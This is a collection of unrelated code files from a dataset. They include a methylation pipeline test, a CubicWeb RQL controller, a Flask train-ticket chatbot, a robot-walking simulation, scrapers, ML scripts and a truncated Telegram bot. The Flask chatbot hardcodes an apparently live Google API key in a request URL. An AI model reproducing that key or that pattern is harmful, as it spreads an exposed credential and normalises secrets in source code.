np.isclose(test_data_containers[1]._SampleDataContainer__data_frame.iloc[0]['noob_unmeth'], 4480.919922):\n raise AssertionError()\n\n @staticmethod\n def test_run_pipeline_export_data():\n \"\"\" check that we get back useful data with --export option \"\"\"\n test_data_dir = 'docs/example_data/GSE69852'\n testfile_1 = Path(test_data_dir, '9247377093', '9247377093_R02C01_processed.csv')\n testfile_2 = Path(test_data_dir, '9247377085', '9247377085_R04C02_processed.csv')\n if testfile_1.exists():\n testfile_1.unlink()\n if testfile_2.exists():\n testfile_2.unlink()\n test_data_containers = pipeline.run_pipeline(test_data_dir, export=True)\n if not testfile_1.exists():\n raise AssertionError(\"no exported processed csv found\")\n\n test1 = pd.read_csv(testfile_1)\n if test1['beta_value'].isna().sum() > 0:\n print(test1.head())\n raise AssertionError('missing values in processed csv')\n test2 = pd.read_csv(testfile_2)\n if test2['beta_value'].isna().sum() > 0:\n print(test2.head())\n raise AssertionError('missing values in processed csv')\n\n # spot checking the output.\n if not np.isclose(test_data_containers[1]._SampleDataContainer__data_frame.iloc[0]['beta_value'], 0.30799999):\n print(test_data_containers[1]._SampleDataContainer__data_frame)\n raise AssertionError(f\"{test_data_containers[1]._SampleDataContainer__data_frame.iloc[0]['beta_value']} vs {0.30799999}\")\n # spot checking the output.\n total_nas = test_data_containers[0]._SampleDataContainer__data_frame['beta_value'].isna().sum()\n if total_nas > 0:\n print(f'found {total_nas} missing beta_values (N/A or inf) in sample')\n raise AssertionError()\n if not np.isclose(test_data_containers[1]._SampleDataContainer__data_frame.iloc[3]['noob_meth'], 3811.0):\n raise AssertionError(f\"{test_data_containers[1]._SampleDataContainer__data_frame.iloc[3]['noob_meth']} vs {3811.162109}\")\n\n @staticmethod\n def test_run_pipeline_epic_plus_export_data():\n \"\"\" check that we get back useful data with --export option \"\"\"\n test_data_dir = 'docs/example_data/epic_plus'\n testfile_1 = Path(test_data_dir, '202651080072', '202651080072_R01C01_processed.csv')\n if testfile_1.exists():\n testfile_1.unlink()\n test_data_containers = pipeline.run_pipeline(test_data_dir, export=True)\n if not testfile_1.exists():\n raise AssertionError(\"no exported processed csv found\")\n\n # spot checking the output.\n test1 = pd.read_csv(testfile_1)\n num_missing = test1['beta_value'].isna().sum()\n if num_missing == 1:\n if test1[test1.beta_value.isna()]['IlmnID'].iloc[0] == 'cg00968771_I_F_C_rep1_GWG1':\n print(\"WARNING: cg00968771_I_F_C_rep1_GWG1 probe data is STILL missing from output\")\n #NOT A FATAL ERROR. but not fixing today.\n elif num_missing > 0:\n print(test1.head())\n raise AssertionError('{num_missing} missing values in processed csv')\n if not np.isclose(test1['beta_value'].iloc[5], 0.145):\n print(test1.iloc[5])\n raise AssertionError('beta_value doesnt match expected value')\n if not np.isclose(test_data_containers[0]._SampleDataContainer__data_frame.iloc[2]['noob_unmeth'], 284.0):\n print(test_data_containers[0]._SampleDataContainer__data_frame)\n raise AssertionError(f\"data_container output ({test_data_containers[0]._SampleDataContainer__data_frame.iloc[2]['noob_unmeth']}) differs from expected value (284.0)\")\n","sub_path":"tests/processing/test_pipeline.py","file_name":"test_pipeline.py","file_ext":"py","file_size_in_byte":8934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"589188945","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /home/nspanti/workspace/rqlcontroller/cubicweb_rqlcontroller/views.py\n# Compiled at: 2020-03-20 10:33:28\n# Size of source mod 2**32: 6343 bytes\n\"\"\"cubicweb-rqlcontroller views/forms/actions/components for web ui\"\"\"\nimport json, re\nfrom six import string_types\nfrom cubicweb.predicates import ExpectedValuePredicate, match_form_params, match_http_method\nfrom cubicweb.uilib import exc_message\nfrom cubicweb.utils import json_dumps\nfrom cubicweb.web import RemoteCallFailed, DirectResponse\nfrom cubicweb.web.controller import Controller\nfrom cubicweb.web.views.urlrewrite import rgx_action, SchemaBasedRewriter\nfrom cubicweb import Binary\nARGRE = re.compile('__r(?P\\\\d+)$')\nDATARE = re.compile('__f(?P.+)$')\n\ndef rewrite_args(args, output, form):\n for k, v in args.items():\n if not isinstance(v, string_types):\n continue\n match = ARGRE.match(v)\n if match:\n numref = int(match.group('ref'))\n if 0 <= numref <= len(output):\n rset = output[numref]\n if not rset:\n raise Exception('%s references empty result set %s' % (\n v, rset))\n if len(rset) > 1:\n raise Exception('%s references multi lines result set %s' % (\n v, rset))\n row = rset.rows[0]\n if len(row) > 1:\n raise Exception('%s references multi column result set %s' % (v, rset))\n args[k] = row[0]\n continue\n match = DATARE.match(v)\n if match:\n args[k] = Binary(form[v][1].read())\n\n\nclass match_request_content_type(ExpectedValuePredicate):\n __doc__ = 'check that the request body has the right content type'\n\n def _get_value(self, cls, req, **kwargs):\n header = req.get_header('Content-Type', None)\n if header is not None:\n header = header.split(';', 1)[0].strip()\n return header\n\n\nclass RqlIOController(Controller):\n __doc__ = \"posted rql queries and arguments use the following pattern:\\n\\n [('INSERT CWUser U: U login %(login)s, U upassword %(pw)s',\\n {'login': 'babar', 'pw': 'cubicweb rulez & 42'}),\\n ('INSERT CWGroup G: G name %(name)s',\\n {'name': 'pachyderms'}),\\n ('SET U in_group G WHERE G eid %(g)s, U eid %(u)s',\\n {'u': '__r0', 'g': '__r1'}),\\n ('INSERT File F: F data %(content)s, F data_name %(fname)s',\\n {'content': '__f0', 'fname': 'toto.txt'}),\\n ]\\n\\n The later query is an example of query built to upload binety\\n data as a file object. It requires to have a multipart query\\n in which there is a part holding a file named '__f0'. See\\n cwclientlib for examples of such queries.\\n\\n Limitations: back references can only work if one entity has been\\n created.\\n\\n \"\n __regid__ = 'rqlio'\n __select__ = match_http_method('POST') & match_request_content_type('application/json', 'multipart/form-data', mode='any') & match_form_params('version')\n\n def json(self):\n contenttype = self._cw.get_header('Content-Type', raw=False)\n if (contenttype.mediaType, contenttype.mediaSubtype) == ('application', 'json'):\n encoding = contenttype.params.get('charset', 'utf-8')\n content = self._cw.content\n else:\n encoding = 'utf-8'\n content = self._cw.form['json'][1]\n try:\n args = json.loads(content.read().decode(encoding))\n except ValueError as exc:\n try:\n raise RemoteCallFailed(exc_message(exc, self._cw.encoding))\n finally:\n exc = None\n del exc\n\n if not isinstance(args, (list, tuple)):\n args = (\n args,)\n return args\n\n def publish(self, rset=None):\n self._cw.ajax_request = True\n self._cw.set_content_type('application/json')\n version = self._cw.form['version']\n if version not in ('1.0', '2.0'):\n raise RemoteCallFailed('unknown rqlio version %r', version)\n args = self.json()\n try:\n result = (self.rqlio)(version, *args)\n except (RemoteCallFailed, DirectResponse):\n raise\n except Exception as exc:\n try:\n raise RemoteCallFailed(exc_message(exc, self._cw.encoding))\n finally:\n exc = None\n del exc\n\n if result is None:\n return b''\n return json_dumps(result).encode(self._cw.encoding)\n\n def rqlio(self, version, *rql_args):\n try:\n output = self._rqlio(rql_args)\n except Exception:\n self._cw.cnx.rollback()\n raise\n else:\n self._cw.cnx.commit()\n if version == '2.0':\n return [{'rows':o.rows, 'variables':o.variables} for o in output]\n return [o.rows for o in output]\n\n def _rqlio(self, rql_args):\n output = []\n for rql, args in rql_args:\n if args is None:\n args = {}\n rewrite_args(args, output, self._cw.form)\n output.append(self._cw.execute(rql, args))\n\n return output\n\n\nclass RQLIORewriter(SchemaBasedRewriter):\n rules = [\n (\n re.compile('/rqlio/(?P.+)$'),\n rgx_action(controller='rqlio', formgroups=('version', )))]","sub_path":"pycfiles/cubicweb-rqlcontroller-0.6.0.tar/views.cpython-37.py","file_name":"views.cpython-37.py","file_ext":"py","file_size_in_byte":5580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"133017752","text":"from flask import Flask, render_template,request,make_response,jsonify\nimport json\nfrom urllib.request import urlopen\n\nfrom webScraper import webScraper\nfrom nlp import nlp\nfrom controller import controller\n\n\n\n#Create flask shell\napp = Flask(__name__)\n\n# Initialize components (Controller, Reasoning Engine, Language Processing)\nnlp = nlp.ReasoningEngine()\ncontroller = controller.ConversationController(nlp)\n\n\n\n\n\n########################################################################\n#\n# Routes and Logic\n#\n\n# Initial SplashScreen\n@app.route(\"/\")\ndef index():\n\n # get users location on index page\n url = 'http://ipinfo.io/json'\n response = urlopen(url)\n data = json.load(response)\n city = data['city']\n loc = data['loc']\n print(\"Detected user city as \" + city + \" (\" + loc + \")\")\n\n # get nearest train station with google places api\n # coords format = 45.77940539999999%2C15.9516292\n locsplit = loc.split(',')\n coords = locsplit[0] + \"%2C\" + locsplit[1]\n g_url = 'https://maps.googleapis.com/maps/api/place/nearbysearch/json?location='+coords+'&rankby=distance&type=train_station&key=AIzaSyCcTgfahn0CZbas24XqkKJbGd9n73_H_pE'\n g_response = urlopen(g_url)\n g_data = json.load(g_response)\n nearest_station = g_data['results'][0]['name']\n print(\"Nearest station (thanks Google) is \" + nearest_station)\n\n # render page\n return render_template('index.html')\n\n# Endpoint for communication... recieving and sending responses\n@app.route(\"/chat\", methods=['POST'])\ndef chat():\n #Read in userInput as string\n userInput = request.get_json()['userMessage']\n\n # Pass the user input to the controller : respond deals with connection to NLP\n response = controller.respond(userInput)\n\n # Determine if its a normal response or the scraped ticket info\n # Normal response\n if(isinstance(response, str )):\n status = \"ticketChat\" \n # Ticket info (stored in a dict)\n elif(isinstance(response, dict )):\n status = \"ticketInfo\"\n\n\n response = make_response(jsonify({\"answer\": response, \"status\" : status}), 200)\n return response\n \n\n# Chatbot endpoint\n@app.route(\"/chatbot\")\ndef chatbot():\n greet = nlp.get_random_greeting()\n return render_template('chatbot.html', greeting = greet)\n\n#\n############################################################################\n\n#RUN FLASK CHATBOT\napp.run(debug=True)\n","sub_path":"flaskChatbot/flaskChatbot.py","file_name":"flaskChatbot.py","file_ext":"py","file_size_in_byte":2388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"409669957","text":"from gait import *\n\nimport pinocchio as se3\nimport tsid\nimport numpy as np\nimport numpy.matlib as matlib\nfrom numpy import nan\nfrom numpy.linalg import norm as norm\nimport os\nimport gepetto.corbaserver\nimport time\nimport commands\nimport sys\n#sys.path += [os.getcwd()+'/../exercizes']\n#import plot_utils as plut\n#import matplotlib.pyplot as plt\n\ndisplay = True\n\nnp.set_printoptions(precision=3, linewidth=200, suppress=True)\n\nmu = 0.3 # friction coefficient\nfMin = 1.0 # minimum normal force\nfMax = 100.0 # maximum normal force\ncontact_frames = ['BL_contact', 'BR_contact', 'FL_contact', 'FR_contact']\ncontactNormal = np.matrix([0., 0., 1.]).T # direction of the normal to the contact surface\n\nw_com = 1.0 # weight of center of mass task\nw_posture = 1e-3 # weight of joint posture task\nw_forceRef = 1e-5 # weight of force regularization task\n\nkp_contact = 10.0 # proportional gain of contact constraint\nkp_com = 10.0 # proportional gain of center of mass task\nkp_posture = 10.0 # proportional gain of joint posture task\n\ndt = 0.001 # controller time step\nPRINT_N = 500 # print every PRINT_N time steps\nDISPLAY_N = 25 # update robot configuration in viwewer every DISPLAY_N time steps\nN_SIMULATION = 6000 # number of time steps simulated\n\ndef AttachContact(name):\n i = contact_frames.index(name)\n contacts[i] = tsid.ContactPoint(name, robot, name, contactNormal, mu, fMin, fMax)\n contacts[i].setKp(kp_contact * matlib.ones(3).T)\n contacts[i].setKd(2.0 * np.sqrt(kp_contact) * matlib.ones(3).T)\n H_rf_ref = robot.framePosition(data, robot.model().getFrameId(name))\n contacts[i].setReference(H_rf_ref)\n contacts[i].useLocalFrame(False)\n invdyn.addRigidContact(contacts[i], w_forceRef, 1.0, 1)\n\ndef DetachContact(name):\n invdyn.removeRigidContact(name, 0.1)\n\ndef SetDesiredCom(gait):\n sampleCom.pos(np.matrix([0.0, gait._comLocation, gait.COM_HEIGHT]).T)\n sampleCom.vel(np.matrix([0.0, speed, 0.0]).T)\n sampleCom.acc(np.matrix([0.0, 0.0, 0.0]).T)\n comTask.setReference(sampleCom)\n\ndef SetDesiredJoints(gait):\n pos = matlib.zeros(8).T\n\n pos[0] = gait._contacts[1]._shAngle\n pos[1] = gait._contacts[1]._knAngle\n\n pos[2] = gait._contacts[3]._shAngle\n pos[3] = gait._contacts[3]._knAngle\n\n pos[4] = gait._contacts[2]._shAngle\n pos[5] = gait._contacts[2]._knAngle\n\n pos[6] = gait._contacts[0]._shAngle\n pos[7] = gait._contacts[0]._knAngle\n\n samplePosture.pos(pos)\n postureTask.setReference(samplePosture)\n\n if gait._contacts[0]._justAttached: \n AttachContact('FR_contact')\n if gait._contacts[0]._justDetached: \n DetachContact('FR_contact')\n\n if gait._contacts[1]._justAttached: \n AttachContact('BL_contact')\n if gait._contacts[1]._justDetached: \n DetachContact('BL_contact')\n\n if gait._contacts[2]._justAttached: \n AttachContact('FL_contact')\n if gait._contacts[2]._justDetached: \n DetachContact('FL_contact')\n\n if gait._contacts[3]._justAttached: \n AttachContact('BR_contact')\n if gait._contacts[3]._justDetached: \n DetachContact('BR_contact') \n\n# load urdf\n\nfilename = str(os.path.dirname(os.path.abspath(__file__)))\nos.chdir(filename)\npath = filename + '/../models'\nurdf = path + '/quadruped/urdf/quadruped.urdf'\nvector = se3.StdVec_StdString()\nvector.extend(item for item in path)\nrobot = tsid.RobotWrapper(urdf, vector, se3.JointModelFreeFlyer(), False)\n\n# for gepetto viewer\nrobot_display = se3.RobotWrapper.BuildFromURDF(urdf, [path, ], se3.JointModelFreeFlyer())\nl = commands.getstatusoutput(\"ps aux |grep 'gepetto-gui'|grep -v 'grep'|wc -l\")\nif int(l[1]) == 0:\n os.system('gepetto-gui &')\ntime.sleep(1)\n\nif display:\n cl = gepetto.corbaserver.Client()\n gui = cl.gui\n robot_display.initDisplay(loadModel=True)\n\nq = matlib.zeros(robot.nq).T\n\nq[2] += 0.5\nfor i in range(4):\n q[7 + 2*i] = -0.8\n q[8 + 2*i] = 1.6\n\nv = matlib.zeros(robot.nv).T\n\nif display:\n robot_display.displayCollisions(False)\n robot_display.displayVisuals(True)\n robot_display.display(q)\n\nassert [robot.model().existFrame(name) for name in contact_frames]\n\nt = 0.0 # time\ninvdyn = tsid.InverseDynamicsFormulationAccForce(\"tsid\", robot, False)\ninvdyn.computeProblemData(t, q, v)\ndata = invdyn.data()\n\n# Place the robot onto the ground.\nid_contact = robot_display.model.getFrameId(contact_frames[0])\nq[2] -= robot.framePosition(data, id_contact).translation[2, 0]\nrobot.computeAllTerms(data, q, v)\n\n#sys.exit()\n\ncontacts = 4*[None]\nfor i, name in enumerate(contact_frames):\n AttachContact(name)\n\n# COM task\n\ncomTask = tsid.TaskComEquality(\"task-com\", robot)\ncomTask.setKp(kp_com * matlib.ones(3).T)\ncomTask.setKd(2.0 * np.sqrt(kp_com) * matlib.ones(3).T)\ninvdyn.addMotionTask(comTask, w_com, 1, 0.0)\n\n#region posture task\n\npostureTask = tsid.TaskJointPosture(\"task-posture\", robot)\npostureTask.setKp(kp_posture * matlib.ones(robot.nv-6).T)\npostureTask.setKd(2.0 * np.sqrt(kp_posture) * matlib.ones(robot.nv-6).T)\ninvdyn.addMotionTask(postureTask, w_posture, 1, 0.0)\n\ncom_ref = robot.com(data)\ntrajCom = tsid.TrajectoryEuclidianConstant(\"traj_com\", com_ref)\nsampleCom = trajCom.computeNext()\n\nq_ref = q[7:]\ntrajPosture = tsid.TrajectoryEuclidianConstant(\"traj_joint\", q_ref)\nsamplePosture = trajPosture.computeNext()\n\nsolver = tsid.SolverHQuadProgFast(\"qp solver\")\n \nspeed = 0.1\ngait = Gait()\n\nfor i in range(0, N_SIMULATION):\n time_start = time.time()\n\n gait.Tick(t, speed, 0)\n\n SetDesiredCom(gait)\n SetDesiredJoints(gait)\n\n # solve\n\n HQPData = invdyn.computeProblemData(t, q, v)\n #if i == 0: HQPData.print_all()\n\n sol = solver.solve(HQPData)\n if(sol.status!=0):\n print (\"[%d] QP problem could not be solved! Error code:\"%(i), sol.status)\n break\n \n tau = invdyn.getActuatorForces(sol)\n dv = invdyn.getAccelerations(sol)\n\n # if i%PRINT_N == 0:\n # print \"Time %.3f\"%(t)\n # print \"\\tNormal forces: \",\n # for contact in contacts:\n # if invdyn.checkContact(contact.name, sol):\n # f = invdyn.getContactForce(contact.name, sol)\n # print \"%4.1f\"%(contact.getNormalForce(f)),\n\n # print \"\\n\\ttracking err %s: %.3f\"%(comTask.name.ljust(20,'.'), norm(comTask.position_error, 2))\n # print \"\\t||v||: %.3f\\t ||dv||: %.3f\"%(norm(v, 2), norm(dv))\n\n v_mean = v + 0.5*dt*dv\n v += dt*dv\n q = se3.integrate(robot.model(), q, dt*v_mean)\n t += dt\n \n if display and i%DISPLAY_N == 0: robot_display.display(q)\n\n time_spent = time.time() - time_start\n if(time_spent < dt): time.sleep(dt-time_spent)\n\n# 0 - right/left\n# 1 - front/back\n# 2 - down/up\n# ...\n# 7 - LBB\n# 8 - LBK\n# 9 - RBB\n# 10 - RBK\n# 11 - LFB\n# 12 - LFK\n# 13 - RFB\n# 14 - RFK","sub_path":"demo/walk.py","file_name":"walk.py","file_ext":"py","file_size_in_byte":6975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"226970245","text":"# -*- coding: utf-8 -*-\nimport scrapy\n\n\nclass PaddypowerComSpider(scrapy.Spider):\n name = 'paddypower_com'\n allowed_domains = ['www.paddypower.com']\n start_urls = ['http://www.paddypower.com/football/euro-football/champions-league']\n\n def start_requests(self):\n for url in self.start_urls:\n yield scrapy.Request(url=url, callback=self.parse)\n\n def parse(self, response):\n json_data = {}\n\n rdata = response.css('div.fb-sub-content')\n for data in rdata:\n for item in data.css('div.fb-odds-group.item > span.odd'):\n json_data[item.css('span.odds-label::text').extract()[0].strip()\n ] = item.css('span.odds-value::text').extract()[0].strip()\n\n with open(\"{}.json\".format(self.name), 'w') as fj:\n import json\n fj.write(json.dumps(json_data))\n self.log('Saved file %s' % \"{}.json\".format(self.name))\n","sub_path":"build/lib/score_crawl/spiders/paddypower_com.py","file_name":"paddypower_com.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"322715615","text":"from airflow import DAG\nfrom airflow.operators.bash_operator import BashOperator\nfrom airflow.operators.python_operator import PythonOperator\nfrom airflow.operators.dummy_operator import DummyOperator\nfrom datetime import datetime, timedelta\n\ndefault_args = {\n 'owner': 'AirFlow',\n 'start_date': datetime(2015, 6, 1),\n 'retry_delay': timedelta(minutes=5)\n\n}\n\ndef print_context(**context):\n print(datetime.now())\n\ndag = DAG('Exercise2', default_args=default_args)\n\nt1 = PythonOperator(\n task_id='print_execution_date',\n provide_context=True,\n python_callable=print_context,\n dag = dag \n)\n\nt2 = BashOperator(\n task_id='wait1',\n bash_command='sleep 1',\n dag = dag \n)\n\nt3 = BashOperator(\n task_id='wait5',\n bash_command='sleep 5',\n dag = dag \n)\n\nt4 = BashOperator(\n task_id='wait10',\n bash_command='sleep 10',\n dag = dag \n)\n\nt5 = DummyOperator(\n task_id='the_end',\n dag = dag \n)\n\nt1 >> [t2, t3,t4] >> t5","sub_path":"dags/exercise2.py","file_name":"exercise2.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"576379046","text":"import threading\ndef run(n):\n print('thring',n)\n\nt_list=[]\nfor i in range(5):\n t=threading.Thread(target=run,args=(i,))\n t.start()\n t_list.append(t) #执行完后的线程 加入到列表中 这样就能确保子线程就都执行万了\n #print(t_list)\nfor z in t_list:\n z.join() #等待 join是主线程等待子线程执行完毕后,在执行\n #print('-',z)\nprint('我是主线程')","sub_path":"untitled1/dream/day-10/线程等待.py","file_name":"线程等待.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"1373583","text":"import json\nfrom google.cloud import firestore\n\ndb = firestore.Client()\n\nwith open('recipes.json', 'r') as json_file:\n c = db.collection('recipes')\n data = json.load(json_file)\n for r in data:\n id = r.pop('Id', None)\n c.add(r, str(id))\n","sub_path":"load.py","file_name":"load.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"161467172","text":"from caravel.storage import entities\n\n\ndef test_query_folding():\n expectations = {\n \"is:Foos\": \"is:Foos\",\n \"CaTs\": \"cat\",\n \"e@mails\": \"e@mails\",\n \"[foo\": \"foo\",\n }\n\n for key, value in expectations.items():\n assert entities.fold_query_term(key) == value\n\n\ndef test_properties():\n ent = entities.Listing(\n title=\"Ma Listing\",\n body=\"Body, Text!\",\n seller=\"e@mail\",\n key_name=\"xyz\",\n posting_time=10.0,\n )\n\n assert ent.permalink == \"xyz\"\n assert ent.primary_category == \"category:miscellaneous\"\n ent.categories = [\"category:books\", \"category:cars\"]\n assert ent.primary_category == \"category:books\"\n assert set(ent.keywords) == set([\"ma\", \"listing\", \"body\", \"text\", \"e@mail\",\n \"category:books\", \"category:cars\",\n \"price:free\"])\n","sub_path":"caravel/tests/test_entities.py","file_name":"test_entities.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"508153395","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport weekday_field.fields\nimport datetime\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Doctor',\n fields=[\n ('id', models.AutoField(serialize=False, verbose_name='ID', auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=255, verbose_name='Name')),\n ('weekdays', weekday_field.fields.WeekdayField(max_length=14, verbose_name='Weekdays')),\n ('time_from', models.TimeField(default=datetime.time(9, 0), verbose_name='Time from')),\n ('time_to', models.TimeField(default=datetime.time(18, 0), verbose_name='Time to')),\n ],\n options={\n 'verbose_name': 'Doctor',\n 'verbose_name_plural': 'Doctors',\n },\n ),\n migrations.CreateModel(\n name='Record',\n fields=[\n ('id', models.AutoField(serialize=False, verbose_name='ID', auto_created=True, primary_key=True)),\n ('patient_name', models.CharField(max_length=255, verbose_name='Full name')),\n ('time', models.DateTimeField(verbose_name='Date and time')),\n ('doctor', models.ForeignKey(to='clinic.Doctor', verbose_name='Doctor')),\n ],\n options={\n 'verbose_name': 'Record',\n 'verbose_name_plural': 'Records',\n },\n ),\n ]\n","sub_path":"clinic/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"136196490","text":"import numpy as np\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.svm import SVC\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nimport re\nfrom nltk.corpus import stopwords\nimport os\n\ndef review_to_wordlist( review):\n review_text = BeautifulSoup(review,\"html.parser\").get_text()\n review_text = re.sub(\"[^a-zA-Z]\",\" \", review_text)\n words = review_text.lower().split()\n stops = set(stopwords.words(\"english\"))\n words = [w for w in words if not w in stops]\n return(words)\n\nif __name__ == \"__main__\":\n\ttrainDataPath=os.path.join(os.path.dirname(__file__), 'data', 'labeledTrainData.tsv')\n\ttestDataPath=os.path.join(os.path.dirname(__file__), 'data', 'testData.tsv')\n\n\ttrain = pd.read_csv(trainDataPath, header=0, delimiter=\"\\t\", quoting=3)\n\t#test = pd.read_csv(testDataPath, header=0, delimiter=\"\\t\", quoting=3 )\n\ttest=train[18750:25000]\n\ttrain=train[:18750]\n\n\tclean_train_reviews = []\n\tfor i in range( 0, len(train[\"review\"])):\n\t\tclean_train_reviews.append(\" \".join(review_to_wordlist(train[\"review\"][i])))\n\tprint(\"cleaned train data\")\n\n\tclean_test_reviews = []\n\tfor i in range( 18750, 25000):\n\t\tclean_test_reviews.append(\" \".join(review_to_wordlist(test[\"review\"][i])))\n\tprint(\"cleaned test data\")\n\n\tm_f = 100\n\t\n\tvectorizer = CountVectorizer(analyzer = \"word\", tokenizer = None, preprocessor = None, stop_words = None, max_features = m_f)\n\ttrain_data_features = vectorizer.fit_transform(clean_train_reviews)\n\ttrain_data_features = train_data_features.toarray()\n\tprint(\"tokens for train made\")\n\t\n\tvecTest = CountVectorizer(analyzer = \"word\", tokenizer = None, preprocessor = None, stop_words = None, max_features = m_f) \n\ttest_data_features = vecTest.fit_transform(clean_test_reviews)\n\ttest_data_features = test_data_features.toarray()\n\tprint(\"tokens for test made\")\n\n\tkernel=\"rbf\"\n\tmodel = SVC(kernel=kernel, gamma='auto') \n\tmodel = model.fit( train_data_features, train[\"sentiment\"] )\n\tprint(\"model made\")\n\n\tresult = model.predict(test_data_features)\n\tprint(\"predictions done\")\n\n\toutput = pd.DataFrame( data={\"id\":test[\"id\"], \"sentiment\":result} )\n\toutput.to_csv(\"outputSVM.csv\", index=False, quoting=3 )\n\tprint(\"output file saved as outputSVM.csv\")\n\n\tactual=test[\"sentiment\"]\n\tpredicted=output[\"sentiment\"]\n\ttrue=0.0\n\ttotal=0.0\n\tfor i in range(18750,25000):\n\t\tif(actual[i]==predicted[i]):\n\t\t\ttrue+=1.0\n\t\ttotal+=1.0\n\tprint(\"Accuracy is \"+str(true/total))\n","sub_path":"SVM/svm.py","file_name":"svm.py","file_ext":"py","file_size_in_byte":2401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"184662952","text":"from fangzhen_lib.sample_GPR import A_GPR\nimport sys\nimport numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler, MinMaxScaler\nfrom sklearn.metrics import mean_squared_error\nimport random\nimport time\nfrom func_model.diatance_trance import time_FS, time_TB\nimport matplotlib.pyplot as plt\nimport warnings\nwarnings.filterwarnings('ignore')\n\n\n\nfrom data.fangzhen_data.func_ND import func_4D\n\n\ndef sample_point(round_xy=None, iter=None, sample_tpye='uniform'):\n m, n = np.shape(round_xy)\n x_temp = np.zeros((iter, m))\n if sample_tpye == 'uniform':\n for k in range(iter):\n for i in range(m):\n x_temp[k, i] = np.random.uniform(round_xy[i, 0] + 10e-99, round_xy[i, 1])\n\n elif sample_tpye == 'linspace':\n for i in range(m):\n x_temp[:, i] = np.linspace(round_xy[i, 0] + 10e-99, round_xy[i, 1], iter)\n\n return x_temp\nf_4d = func_4D()\nx_rpund = f_4d.round_x\n\nnum_low_data = 10\nx_train_l = sample_point(round_xy=x_rpund, iter=num_low_data)\ny_train_l = np.reshape([f_4d.f_l(x_train_l[i]) for i in range(num_low_data)], (-1,1))\n\nnum_high_data = 500\nx_data = sample_point(round_xy=x_rpund, iter=num_high_data)\ny_data = [f_4d.f_obj(x_data[i]) for i in range(num_high_data)]\nx_train, x_test, y_train, y_test = train_test_split(x_data, np.reshape(y_data, (-1, 1)), test_size=0.3)\n\n\n\nm, n = np.shape(x_train)\nprint('训练数据总量', m)\nprint('低似真度数据样本量:', np.shape(x_train_l)[0])\n\n\na_gpr = A_GPR()\nrandom_data = 40\nx_data_1 = sample_point(round_xy=x_rpund, iter=random_data)\ny_data_1 = [f_4d.f_obj(x_data[i]) for i in range(random_data)]\n\nmodel = a_gpr.creat_gpr_model(x_data_1, np.reshape(y_data_1, (-1, 1)))\n\ny_pre = [a_gpr.predict_mu_var(np.array(x_test[i], ndmin=2), model, re_var=False) for i in range(np.shape(x_test)[0])]\n\nprint(mean_squared_error(y_test, y_pre))\n","sub_path":"fangzhen_lib/random_point.py","file_name":"random_point.py","file_ext":"py","file_size_in_byte":1923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"253480364","text":"vowels = \"aeiouAEIOU\" #storing vowels as a word in variable\n\nuserinput = input(\"Enter a word : \") #storing user input in a variable\n\ncount = 0\nfor i in vowels: #iterating through the word stored in vowels variable\n for j in userinput: #iterating through the word entered by user\n if(i == j): #checking whether any letter matches\n count = count + 1 # Incrementing the count if a letter is matched\nprint(\"No: of Vowels in \" +userinput+ \" is \" + str(count)) #Printing no: of vowels\n\n\n\n","sub_path":"vowelcount.py","file_name":"vowelcount.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"33055670","text":"import const,var\nimport miniflux_client\nimport telegram\nfrom telegram import InlineKeyboardButton, InlineKeyboardMarkup\nfrom telegram.ext import CallbackQueryHandler\nimport re,threading\n\ndef check_admin(check_id):\n admin_list = var.get('admin_list', [])\n if check_id in admin_list:\n return True\n return False\n\ndef callback_query(bot, update):\n if not check_admin(update.callback_query.from_user.id):\n return\n callback_data = update.callback_query.data\n origin_message_id = update.callback_query.message.message_id\n text = update.callback_query.message.text\n chat_id = update.callback_query.message.chat_id\n args = callback_data.split(',')\n entryid = int(args[1])\n isread = int(args[2])\n isstar = int(args[3])\n motd_keyboard = None\n callbackanswer = ''\n if args[0] == 'rssmarkread':\n motd_keyboard = [[\n InlineKeyboardButton(\n '📦 ✅',\n callback_data=\"rssmarkunread,%d,%d,%d\" % (entryid,1,isstar)\n )\n ,\n InlineKeyboardButton(\n '✨'+['', ' ✅'][isstar],\n callback_data=\"%s,%d,%d,%d\" % ((\"rssmarkstar\",\"rssmarkunstar\")[isstar], entryid, 1, isstar)\n )\n ]]\n callbackanswer = '已标记为已读'\n elif args[0] == 'rssmarkstar':\n motd_keyboard = [[\n InlineKeyboardButton(\n '📦 